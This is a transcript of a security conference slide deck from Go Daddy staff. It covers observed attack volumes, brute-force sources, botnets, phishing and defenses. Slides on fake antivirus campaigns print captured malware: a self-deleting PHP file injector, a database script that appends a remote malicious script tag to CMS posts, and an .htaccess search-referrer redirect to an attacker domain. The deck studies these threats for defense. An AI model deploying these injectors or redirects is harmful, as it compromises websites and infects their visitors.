keeping up with the web application security
DESCRIPTION
Ganesh Devarajan & Todd Redfoot. Keeping up with the web application security. Introduction. Todd Redfoot Chief Information Security Officer Ganesh Devarajan Sr. Security Architect. The Background (What does Go Daddy do?). What does Go Daddy do?. 9.4 Million Customers - PowerPoint PPT PresentationTRANSCRIPT
![Page 1: Keeping up with the web application security](https://reader035.vdocuments.site/reader035/viewer/2022062813/568165aa550346895dd891ca/html5/thumbnails/1.jpg)
KEEPING UP WITH THE WEB APPLICATION SECURITY
Ganesh Devarajan & Todd Redfoot
![Page 2: Keeping up with the web application security](https://reader035.vdocuments.site/reader035/viewer/2022062813/568165aa550346895dd891ca/html5/thumbnails/2.jpg)
Introduction
Todd Redfoot Chief Information Security Officer
Ganesh Devarajan Sr. Security Architect
![Page 3: Keeping up with the web application security](https://reader035.vdocuments.site/reader035/viewer/2022062813/568165aa550346895dd891ca/html5/thumbnails/3.jpg)
The Background
(What does Go Daddy do?)
![Page 4: Keeping up with the web application security](https://reader035.vdocuments.site/reader035/viewer/2022062813/568165aa550346895dd891ca/html5/thumbnails/4.jpg)
![Page 5: Keeping up with the web application security](https://reader035.vdocuments.site/reader035/viewer/2022062813/568165aa550346895dd891ca/html5/thumbnails/5.jpg)
What does Go Daddy do?
9.4 Million Customers 48 Million Domains Under Management Over 5 million Active Hosting Accounts 1/3 of all DNS queries run through our
servers We register, renew or transfer more
than one domain name every second
![Page 6: Keeping up with the web application security](https://reader035.vdocuments.site/reader035/viewer/2022062813/568165aa550346895dd891ca/html5/thumbnails/6.jpg)
What does Go Daddy do?
40+ Security Professionals in Team 24 x 7 Operations Center Research Engineering Forensics Customer Security Advisors Penetration Testing User Administration Development
![Page 7: Keeping up with the web application security](https://reader035.vdocuments.site/reader035/viewer/2022062813/568165aa550346895dd891ca/html5/thumbnails/7.jpg)
![Page 8: Keeping up with the web application security](https://reader035.vdocuments.site/reader035/viewer/2022062813/568165aa550346895dd891ca/html5/thumbnails/8.jpg)
The Numbers
(What does Go Daddy see?)
![Page 9: Keeping up with the web application security](https://reader035.vdocuments.site/reader035/viewer/2022062813/568165aa550346895dd891ca/html5/thumbnails/9.jpg)
What do we see?
Monitor over 100,000 events per second 8.6 Billion/Day
DDoS - ~900 Attacks per day / 6K per week Feb 2011 - Largest attack @ 21M pps Last Week – 40G Attack
Brute Force – 3.5M per hour
![Page 10: Keeping up with the web application security](https://reader035.vdocuments.site/reader035/viewer/2022062813/568165aa550346895dd891ca/html5/thumbnails/10.jpg)
What do we see?
“Other” Attacks : 425K – Invalid Directory Traversal 90K – XSS Prevention 115K – SQL Injection Prevention
… all in a 24 hour period…
![Page 11: Keeping up with the web application security](https://reader035.vdocuments.site/reader035/viewer/2022062813/568165aa550346895dd891ca/html5/thumbnails/11.jpg)
Current Trends
![Page 12: Keeping up with the web application security](https://reader035.vdocuments.site/reader035/viewer/2022062813/568165aa550346895dd891ca/html5/thumbnails/12.jpg)
SSH Brute Forcers
US54%
CN20%
KR6%
BG4%
AR4% TW
3%FR2%
JP2%
CA2%
BR2%
![Page 13: Keeping up with the web application security](https://reader035.vdocuments.site/reader035/viewer/2022062813/568165aa550346895dd891ca/html5/thumbnails/13.jpg)
SSH Brute Forcers
Englewood, Colorado140 Million attempts
![Page 14: Keeping up with the web application security](https://reader035.vdocuments.site/reader035/viewer/2022062813/568165aa550346895dd891ca/html5/thumbnails/14.jpg)
MS-SQL Brute Forcers
US65%
CN24%
TR5%
CA2%
-1%
KR1%
TH1%
RU0%
VN0%
IE0%
![Page 15: Keeping up with the web application security](https://reader035.vdocuments.site/reader035/viewer/2022062813/568165aa550346895dd891ca/html5/thumbnails/15.jpg)
MS-SQL Brute Forcers
Orlando, FL348 Million attempts
![Page 16: Keeping up with the web application security](https://reader035.vdocuments.site/reader035/viewer/2022062813/568165aa550346895dd891ca/html5/thumbnails/16.jpg)
My-SQL Brute Forcers
US78%
CN12%
CA4%
SE2%
FR2%
MY1%
PH1%
IN0%
JP0%
KR0%
![Page 17: Keeping up with the web application security](https://reader035.vdocuments.site/reader035/viewer/2022062813/568165aa550346895dd891ca/html5/thumbnails/17.jpg)
My-SQL Brute Forcers
![Page 18: Keeping up with the web application security](https://reader035.vdocuments.site/reader035/viewer/2022062813/568165aa550346895dd891ca/html5/thumbnails/18.jpg)
FTP Brute Forcers
CN66%
US26%
HK2%
CA2%IE
2%TW1%
KR1%
RS0%
DE0%
BR0%
![Page 19: Keeping up with the web application security](https://reader035.vdocuments.site/reader035/viewer/2022062813/568165aa550346895dd891ca/html5/thumbnails/19.jpg)
FTP Brute Forcers
XingPing, CN12 Million attempts
![Page 20: Keeping up with the web application security](https://reader035.vdocuments.site/reader035/viewer/2022062813/568165aa550346895dd891ca/html5/thumbnails/20.jpg)
Brute Forcers - All
US61%
CN27%
TR4%KR
2%CA2%-
1%BG1%
TH1%
AR1%
TW1%
![Page 21: Keeping up with the web application security](https://reader035.vdocuments.site/reader035/viewer/2022062813/568165aa550346895dd891ca/html5/thumbnails/21.jpg)
Brute Forcers - US
Garden City, NY75.7 Million attempts
![Page 22: Keeping up with the web application security](https://reader035.vdocuments.site/reader035/viewer/2022062813/568165aa550346895dd891ca/html5/thumbnails/22.jpg)
Brute Forcers - CN
Datong, CN22.5 Million attempts
![Page 23: Keeping up with the web application security](https://reader035.vdocuments.site/reader035/viewer/2022062813/568165aa550346895dd891ca/html5/thumbnails/23.jpg)
Brute Forcinator
![Page 24: Keeping up with the web application security](https://reader035.vdocuments.site/reader035/viewer/2022062813/568165aa550346895dd891ca/html5/thumbnails/24.jpg)
SQL Injection
US41%
CN28%
BG9%
UK5%
ID4%NL
4%CZ3%JP
3%AU2%
FR2%
![Page 25: Keeping up with the web application security](https://reader035.vdocuments.site/reader035/viewer/2022062813/568165aa550346895dd891ca/html5/thumbnails/25.jpg)
SQL Injection
Seattle, WA1.3 Million attempts
![Page 26: Keeping up with the web application security](https://reader035.vdocuments.site/reader035/viewer/2022062813/568165aa550346895dd891ca/html5/thumbnails/26.jpg)
Backdoor Shells
US87%
ID4%
NG2%UK
2%CN1%
CA1%
DE1%
BR1%
NL1%
AL0%
![Page 27: Keeping up with the web application security](https://reader035.vdocuments.site/reader035/viewer/2022062813/568165aa550346895dd891ca/html5/thumbnails/27.jpg)
Backdoor Shells
Phone Company (91%)Mountain View, CA
![Page 28: Keeping up with the web application security](https://reader035.vdocuments.site/reader035/viewer/2022062813/568165aa550346895dd891ca/html5/thumbnails/28.jpg)
PHP AttacksUS
65%
KR8%
FR6%
RU4%DE
3%LU3%UK
3%BR3%
CA2%
NL2%
![Page 29: Keeping up with the web application security](https://reader035.vdocuments.site/reader035/viewer/2022062813/568165aa550346895dd891ca/html5/thumbnails/29.jpg)
PHP Attacks
Berlin, Germany1.9 Million attempts
![Page 30: Keeping up with the web application security](https://reader035.vdocuments.site/reader035/viewer/2022062813/568165aa550346895dd891ca/html5/thumbnails/30.jpg)
PHP Attacks
Montreal, CA1.1 Million attempts
![Page 31: Keeping up with the web application security](https://reader035.vdocuments.site/reader035/viewer/2022062813/568165aa550346895dd891ca/html5/thumbnails/31.jpg)
Botnet
US52%
UK7%
KR6%
PL6%
FR6%
DE6%
CA6%
RU5%
NL4%
AU3%
![Page 32: Keeping up with the web application security](https://reader035.vdocuments.site/reader035/viewer/2022062813/568165aa550346895dd891ca/html5/thumbnails/32.jpg)
Botnet
![Page 33: Keeping up with the web application security](https://reader035.vdocuments.site/reader035/viewer/2022062813/568165aa550346895dd891ca/html5/thumbnails/33.jpg)
Botnet
Source - https://zeustracker.abuse.ch/
![Page 34: Keeping up with the web application security](https://reader035.vdocuments.site/reader035/viewer/2022062813/568165aa550346895dd891ca/html5/thumbnails/34.jpg)
Botnet
Source - http://www.shadowserver.org/wiki/pmwiki.php/Stats/DroneMaps
![Page 35: Keeping up with the web application security](https://reader035.vdocuments.site/reader035/viewer/2022062813/568165aa550346895dd891ca/html5/thumbnails/35.jpg)
Phishing
![Page 36: Keeping up with the web application security](https://reader035.vdocuments.site/reader035/viewer/2022062813/568165aa550346895dd891ca/html5/thumbnails/36.jpg)
The Good, Bad and Ugly?
![Page 37: Keeping up with the web application security](https://reader035.vdocuments.site/reader035/viewer/2022062813/568165aa550346895dd891ca/html5/thumbnails/37.jpg)
The Bad – Most Events
![Page 38: Keeping up with the web application security](https://reader035.vdocuments.site/reader035/viewer/2022062813/568165aa550346895dd891ca/html5/thumbnails/38.jpg)
The Ugly – Security Events & DDoS
![Page 39: Keeping up with the web application security](https://reader035.vdocuments.site/reader035/viewer/2022062813/568165aa550346895dd891ca/html5/thumbnails/39.jpg)
New Trends
![Page 40: Keeping up with the web application security](https://reader035.vdocuments.site/reader035/viewer/2022062813/568165aa550346895dd891ca/html5/thumbnails/40.jpg)
Recent Changes
“Hacktivists” Lulzsec = Twitter ComodoHacker = Pastebin
Phishing -> Spear Phishing Targeted & Coordinated Attacks
RSA / Lockheed Martin Connection
![Page 41: Keeping up with the web application security](https://reader035.vdocuments.site/reader035/viewer/2022062813/568165aa550346895dd891ca/html5/thumbnails/41.jpg)
What’s in the News?
![Page 42: Keeping up with the web application security](https://reader035.vdocuments.site/reader035/viewer/2022062813/568165aa550346895dd891ca/html5/thumbnails/42.jpg)
More Client-side Exploits Browser exploits Adobe exploits
Web Server Compromises Brute Force Attacks Leveraging Web Application Vulnerabilities Config files with passwords
More of the same…
![Page 43: Keeping up with the web application security](https://reader035.vdocuments.site/reader035/viewer/2022062813/568165aa550346895dd891ca/html5/thumbnails/43.jpg)
Scareware Reports fake viruses to users Asks for fee to remove the threat
Paying does nothing but give them your CC# $10 Million in Revenue last year
Fake AV
![Page 44: Keeping up with the web application security](https://reader035.vdocuments.site/reader035/viewer/2022062813/568165aa550346895dd891ca/html5/thumbnails/44.jpg)
Fake AV Analysis
![Page 45: Keeping up with the web application security](https://reader035.vdocuments.site/reader035/viewer/2022062813/568165aa550346895dd891ca/html5/thumbnails/45.jpg)
$$$$$$
<html>Holy Crap! Infected! Click Here to clean</html>
GET http://intermediary.com/ll.php
Make HTTP calls to infection script and site is infected
Compromised Attack Server(s)
Servers with Compromised Accounts(Zeus/Phishing/etc)
FTP/SSH Upload of Attack Shell/Script
Casual Web User Visits Infected Site
End Users
Fake AV Basterds
<script>http://intermediary.com/ll.php</script>
Disposable Domain Name
Registrant:Hilary Kneber [email protected] fax: 756946829/2 Sun street. Montey 29Virginia NA 3947
Fake AV – Attack Breakdown
![Page 46: Keeping up with the web application security](https://reader035.vdocuments.site/reader035/viewer/2022062813/568165aa550346895dd891ca/html5/thumbnails/46.jpg)
$z=$_SERVER["DOCUMENT_ROOT"];$encoded='<'.'?php /**/ [base64 encoded string]"));?'.'>';@unlink($_SERVER['SCRIPT_FILENAME']);$val=$z;$totalinjected=0;echo "Working with $val\n!!STARTING!!";ob_flush();$start_time=microtime(true);if ($val!="")do_folder($val);$end_time=microtime(true)-$start_time;echo "|Injected| $totalinjected files in $end_time seconds\n";
Fake AV – Sample Shell
![Page 47: Keeping up with the web application security](https://reader035.vdocuments.site/reader035/viewer/2022062813/568165aa550346895dd891ca/html5/thumbnails/47.jpg)
…
$insert='<script src="http://welcometotheglobalisorg.com/js.php?kk=26"></script>';
...
$link=mysql_connect($host,$user,$pass);
if (!$link) {
die('Could not connect: ' . mysql_error());
}else{
echo 'Connected successfully'."\n";
$db_list = mysql_list_dbs($link);
$bases = array();
while ($row = mysql_fetch_object($db_list)) {
$bases[]=$row->Database;
}
…
//wordpress
if (last_is($table,"_posts")){ $query="UPDATE `".$bases[$i]."`.`$table` SET `post_content` = concat(`post_content`,'$insert')"; }
//joomla
if (last_is($table,"_content")){ $query="UPDATE `".$bases[$i]."`.`$table` SET `introtext` = concat(`introtext`,'$insert')“; }
//drupal
if (last_is($table,"node_revisions")){ $query="UPDATE `".$bases[$i]."`.`$table` SET `body` = concat(`body`,'$insert'), format=2“; }
if (last_is($table,"_post")){ $query="UPDATE `".$bases[$i]."`.`$table` SET `title` = concat(`title`,'$insert')“; }
Fake AV – DB Variant
![Page 48: Keeping up with the web application security](https://reader035.vdocuments.site/reader035/viewer/2022062813/568165aa550346895dd891ca/html5/thumbnails/48.jpg)
Fake AV - Search Redirect<IfModule mod_rewrite.c>RewriteEngine OnRewriteOptions inheritRewriteCond %{HTTP_REFERER} .*ask.com.*$ [NC,OR]RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]RewriteCond %{HTTP_REFERER} .*msn.com*$ [NC,OR]RewriteCond %{HTTP_REFERER} .*bing.com*$ [NC,OR]RewriteCond %{HTTP_REFERER} .*live.com*$ [NC,OR]RewriteCond %{HTTP_REFERER} .*aol.com*$ [NC,OR]RewriteCond %{HTTP_REFERER} .*altavista.com*$ [NC,OR]RewriteCond %{HTTP_REFERER} .*excite.com*$ [NC,OR]RewriteCond %{HTTP_REFERER} .*search.yahoo*$ [NC]RewriteRule .* http://sokoloperkovuskeci.com/in.php?g=945 [R,L]</IfModule>
addhandler x-httpd-php-cgi .php4addhandler x-httpd-php5-cgi .php5addhandler x-httpd-php5-cgi .php
![Page 49: Keeping up with the web application security](https://reader035.vdocuments.site/reader035/viewer/2022062813/568165aa550346895dd891ca/html5/thumbnails/49.jpg)
Custom Monitoring
![Page 50: Keeping up with the web application security](https://reader035.vdocuments.site/reader035/viewer/2022062813/568165aa550346895dd891ca/html5/thumbnails/50.jpg)
UDP Flooder
![Page 51: Keeping up with the web application security](https://reader035.vdocuments.site/reader035/viewer/2022062813/568165aa550346895dd891ca/html5/thumbnails/51.jpg)
How to Protect?
![Page 52: Keeping up with the web application security](https://reader035.vdocuments.site/reader035/viewer/2022062813/568165aa550346895dd891ca/html5/thumbnails/52.jpg)
Website Vulnerability Scanners Website Protection -Site Scanner
($48/Year) Beyond Security($99.95/Year) McAfee SecureTM (~$2100/Year) WhiteHat Security® IBM AppScan® Cenzic® HP WebInspect®
![Page 53: Keeping up with the web application security](https://reader035.vdocuments.site/reader035/viewer/2022062813/568165aa550346895dd891ca/html5/thumbnails/53.jpg)
Web Based Malware Detection Virtual machine Honey pots
Monitor Creation of new Processes, File system or Registry entries, etc.
Browser Emulation Reputation Service
Internet’s black list Signature Based Detection/Prevention
Intrusion Detection System/Intrusion Prevention System
Anti-Virus
![Page 54: Keeping up with the web application security](https://reader035.vdocuments.site/reader035/viewer/2022062813/568165aa550346895dd891ca/html5/thumbnails/54.jpg)
New Methodologies
![Page 55: Keeping up with the web application security](https://reader035.vdocuments.site/reader035/viewer/2022062813/568165aa550346895dd891ca/html5/thumbnails/55.jpg)
Questions?